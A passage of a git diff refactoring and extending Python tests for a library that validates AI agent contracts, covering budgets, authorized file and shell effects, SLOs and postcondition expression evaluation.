validate_contract(tier2_data) - assert errors == [] + assert validate_contract(tier2_data) == [] def test_missing_identity(self) -> None: data = { @@ -57,7 +54,7 @@ def test_missing_identity(self) -> None: "contract": {"postconditions": [{"name": "x", "check": "true"}]}, } errors = validate_contract(data) - assert any("identity" in e for e in errors) + assert any("identity" in error for error in errors) def test_missing_postconditions(self) -> None: data = { @@ -66,7 +63,7 @@ def test_missing_postconditions(self) -> None: "contract": {"postconditions": []}, } errors = validate_contract(data) - assert any("postconditions" in e for e in errors) + assert any("postconditions" in error for error in errors) def test_invalid_version_format(self) -> None: data = { @@ -75,18 +72,16 @@ def test_invalid_version_format(self) -> None: 
"contract": {"postconditions": [{"name": "x", "check": "true"}]}, } errors = validate_contract(data) - assert any("agent_contract" in e for e in errors) + assert any("agent_contract" in error for error in errors) def test_x_extension_allowed(self, tier0_data: Dict[str, Any]) -> None: tier0_data["x-custom-field"] = {"hello": "world"} - errors = validate_contract(tier0_data) - assert errors == [] + assert validate_contract(tier0_data) == [] class TestLoadContract: def test_load_tier0(self, tmp_yaml, tier0_data: Dict[str, Any]) -> None: - path = tmp_yaml(tier0_data) - contract = load_contract(path) + contract = load_contract(tmp_yaml(tier0_data)) assert contract.tier == 0 assert contract.identity.name == "test-agent" assert contract.identity.version == "1.0.0" @@ -94,17 +89,20 @@ def test_load_tier0(self, tmp_yaml, tier0_data: Dict[str, Any]) -> None: assert contract.postconditions[0].name == "has_output" def test_load_tier1(self, tmp_yaml, tier1_data: Dict[str, Any]) -> None: - path = tmp_yaml(tier1_data) - contract = load_contract(path) + contract = load_contract(tmp_yaml(tier1_data)) assert contract.tier == 1 assert contract.budgets is not None assert contract.budgets.max_cost_usd == 0.50 + assert contract.budgets.max_shell_commands == 5 assert contract.effects_authorized is not None assert "search" in contract.effects_authorized.tools + assert contract.effects_authorized.filesystem is not None + assert contract.effects_authorized.filesystem.write == ["src/**", "tests/**"] + assert contract.effects_authorized.shell is not None + assert "python -m pytest *" in contract.effects_authorized.shell.commands def test_load_tier2(self, tmp_yaml, tier2_data: Dict[str, Any]) -> None: - path = tmp_yaml(tier2_data) - contract = load_contract(path) + contract = load_contract(tmp_yaml(tier2_data)) assert contract.tier == 2 assert contract.failure_model is not None assert len(contract.failure_model.errors) == 2 @@ -114,6 +112,13 @@ def test_load_tier2(self, tmp_yaml, tier2_data: 
Dict[str, Any]) -> None: assert contract.slo is not None assert contract.slo.contract_satisfaction_rate is not None assert contract.slo.contract_satisfaction_rate.target == 0.995 + assert contract.observability is not None + assert contract.observability.run_artifact_path == ".agent-contracts/runs/{run_id}/verdict.json" + + def test_source_path_preserved(self, tmp_yaml, tier0_data: Dict[str, Any]) -> None: + path = tmp_yaml(tier0_data) + contract = load_contract(path) + assert contract.source_path == str(path.resolve()) def test_strict_validation_raises(self, tmp_yaml) -> None: bad_data = {"agent_contract": "bad", "identity": {"name": "a"}} @@ -127,13 +132,11 @@ def test_non_strict_returns_partial(self, tmp_yaml) -> None: "identity": {"name": "partial", "version": "0.0.1"}, "contract": {"postconditions": [{"name": "x", "check": "true"}]}, } - path = tmp_yaml(partial) - contract = load_contract(path, strict=False) + contract = load_contract(tmp_yaml(partial), strict=False) assert contract.identity.name == "partial" def test_raw_preserved(self, tmp_yaml, tier0_data: Dict[str, Any]) -> None: tier0_data["x-custom"] = "value" - path = tmp_yaml(tier0_data) - contract = load_contract(path) + contract = load_contract(tmp_yaml(tier0_data)) assert contract.raw is not None assert contract.raw["x-custom"] == "value" diff --git a/tests/test_postconditions.py b/tests/test_postconditions.py index b437be4..df9d875 100644 --- a/tests/test_postconditions.py +++ b/tests/test_postconditions.py @@ -32,10 +32,6 @@ def test_equality(self) -> None: assert evaluate_expression('output.status == "resolved"', ctx) is True assert evaluate_expression('output.status == "failed"', ctx) is False - def test_inequality(self) -> None: - ctx = {"output": {"status": "resolved"}} - assert evaluate_expression('output.status != "failed"', ctx) is True - def test_numeric_comparison(self) -> None: ctx = {"output": {"score": 0.85}} assert evaluate_expression("output.score >= 0.8", ctx) is True @@ -59,9 
+55,10 @@ def test_nested_path(self) -> None: ctx = {"output": {"data": {"nested": {"value": 42}}}} assert evaluate_expression("output.data.nested.value == 42", ctx) is True - def test_missing_path_returns_false(self) -> None: - ctx = {"output": {}} - assert evaluate_expression("output.nonexistent is not None", ctx) is False + def test_logical_and_or(self) -> None: + ctx = {"checks": {"pytest": {"exit_code": 0}, "ruff": {"exit_code": 1}}} + assert evaluate_expression("checks.pytest.exit_code == 0 and checks.ruff.exit_code == 1", ctx) is True + assert evaluate_expression("checks.pytest.exit_code == 1 or checks.ruff.exit_code == 1", ctx) is True def test_truthiness_fallback(self) -> None: assert evaluate_expression("output", {"output": "nonempty"}) is True @@ -84,27 +81,24 @@ def test_sync_warn_calls_callback(self) -> None: warnings: list = [] pcs = [PostconditionDef(name="warn_check", check='output == "good"', enforcement="sync_warn")] results = evaluate_postconditions(pcs, "bad", on_warn=lambda pc, o: warnings.append(pc.name)) - assert len(warnings) == 1 - assert warnings[0] == "warn_check" + assert warnings == ["warn_check"] assert results[0].passed is False - def test_async_monitor_deferred(self) -> None: - async_items: list = [] - pcs = [PostconditionDef(name="async_check", check="output > 0", enforcement="async_monitor")] - results = evaluate_postconditions(pcs, -1, on_async=lambda pc, o: async_items.append(pc.name)) - assert len(async_items) == 1 - # async_monitor always returns passed=True (deferred evaluation) - assert results[0].passed is True - def test_eval_judge_skipped(self) -> None: pcs = [PostconditionDef(name="judge", check="eval:quality_judge", enforcement="sync_block")] - results = evaluate_postconditions(pcs, "anything") - assert results[0].passed is True # Skipped, not evaluated + assert evaluate_postconditions(pcs, "anything")[0].passed is True - def test_multiple_postconditions(self) -> None: + def test_checks_context(self) -> None: pcs = [ - 
PostconditionDef(name="not_none", check="output is not None", enforcement="sync_block"), - PostconditionDef(name="has_data", check='output.status == "ok"', enforcement="sync_warn"), + PostconditionDef( + name="repo_checks_green", + check="checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0", + enforcement="sync_block", + ) ] - results = evaluate_postconditions(pcs, {"status": "ok"}) - assert all(r.passed for r in results) + results = evaluate_postconditions( + pcs, + {"status": "done"}, + extra_context={"checks": {"pytest": {"exit_code": 0}, "ruff": {"exit_code": 0}}}, + ) + assert results[0].passed is True